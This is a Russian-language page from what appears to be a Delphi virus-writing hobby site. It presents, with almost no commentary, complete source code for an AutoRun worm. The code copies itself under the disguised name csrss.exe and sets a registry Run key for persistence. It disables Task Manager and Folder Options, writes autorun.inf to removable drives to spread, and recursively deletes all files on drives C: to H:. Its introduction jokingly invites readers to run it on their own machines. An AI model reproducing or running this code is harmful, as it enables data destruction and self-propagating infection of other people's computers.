AutoRun на Delphi - Вирусология - Delphi - Каталог статей - Вирусология, взгляд из Delphi
Понедельник, 05.12.2016, 23:42 Приветствую вас Гость | Группа "Гости" 


Меню сайта

Категории раздела
Вирусология [39]
Статьи о вирусах
Системные [0]
Работа с системой
Примеры [44]
Приёмы, функции, процедуры
Ceти [1]
Работа с интернет
Приколы [5]
Пишем шуточные програмки
Остальное [5]
Всё что не вошло

Администрация
000000 dolphin

Помощь проекту

R106276538945
Z160640024212

Яндекс деньги
410011190732605

Недавние темы

Опрос
Каким браузером вы пользуетесь?

Всего ответов: 521

Главная » Статьи » Delphi » Вирусология

AutoRun на Delphi
Так, кому не нравиться сайт или что-о с ним связанное - пишем ЭТО и запускаем у себя на компьютере…

Virus.Win32.AutoRun.ah


var WinDir, SysDir: String; Buffer: array[0..1023] of Char;

  F: TextFile; Reg: TRegistry; //

function DriveExists(Drive: Byte): Boolean;

begin

  Result:= Boolean(GetLogicalDrives AND(1 shl Drive))

end;

procedure InFect(FileName: String);

begin

AssignFile(F,FileName);

Reset(F);

WriteLn(F,’open=’+SysDir+’\config\csrss.exe’);

CloseFile(F);

end;

procedure FindAndDelete(Drive: String);

var

  SearchRec: TSearchRec; //

begin

 

  if FindFirst(Drive+’*.*’, faAnyFile,SearchRec) = 0 then

  repeat

  if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then

  begin

DeleteFile(SearchRec.Name);

  end;

  until FindNext(SearchRec) <> 0;

 

  if FindFirst(’*', faAnyFile, SearchRec) = 0 then

  repeat

  if (SearchRec.Attr and faDirectory) = faDirectory then

  if SearchRec.Name[1] <> ‘.’ then

  begin

  ChDir(SearchRec.Name);//

  FindAndDelete(Drive); //

  ChDir(’..’);//

  end;

  until FindNext(SearchRec) <> 0;

end;

SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));

CopyFile(PChar(ParamStr(0)),PChar(WinDir+’\media\arona.exe’),false);

SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer)));

CopyFile(PChar(ParamStr(0)),PChar(SysDir+’\config\csrss.exe’),false);

AssignFile(F,SysDir+’\config\logon.bat’);

Reset(F);

WriteLn(F,’@'+SysDir+’\config\csrss.exe’);

CloseFile(F);

Reg:=TRegistry.Create;

Reg.RootKey:=HKEY_LOCAL_MACHINE;

Reg.OpenKey(’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true);

Reg.WriteString(’Worms’,SysDir+’\config\logon.bat’);

Reg.CloseKey;

Reg.RootKey:=HKEY_CURRENT_USER;

REg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\System’,true);

Reg.WriteInteger(’DisableTaskMgr’,1);

Reg.CloseKey;

Reg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\Explorer’,true);

Reg.WriteInteger(’NoFolderOptions’,1);

Reg.Free;

try

InFect(SysDir+’\config\autorun.inf’);

if DriveExists(5) then //

begin

InFect(’F:\autorun.inf’);

end;

if DriveExists(6) then //

begin

InFect(’G:\autorun.inf’);

end;

if DriveExists(7) then //

begin

InFect(’H:\autorun.inf’);

end;

if DriveExists(10) then begin

InFect(’K:\autorun.inf’)

;

end;

if DriveExists(11) then 

begin

InFect(’L:\autorun.inf’);

end;

if DriveExists(14) then

begin

InFect(’O:\autorun.inf’);

end;

except

Exit;

end;

try

FindAndDelete(’D:\’);

FindAndDelete(’C:\’);

FindAndDelete(’E:\’);

FindAndDelete(’F:\’);

FindAndDelete(’G:\’);

FindAndDelete(’H:\’);

except

Exit;

end;

Категория: Вирусология | Добавил: dolphin (27.09.2008)
Просмотров: 2169 | Комментарии: 1 | Рейтинг: 3.7/3

Всего комментариев: 1
avatar
1
happy
Описание повеселило
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка

Вирусология, взгляд из Delphi



Статистика
HSDN :: Рейтинг сайтов WOlist.ru - каталог качественных сайтов Рунета Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 364
Форум: 1128/7979
Коментариев: 759
Новостей: 27

Статистика пользователей
Всего: 409
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delfcode.ru © 2008 - 2016 Хостинг от uCoz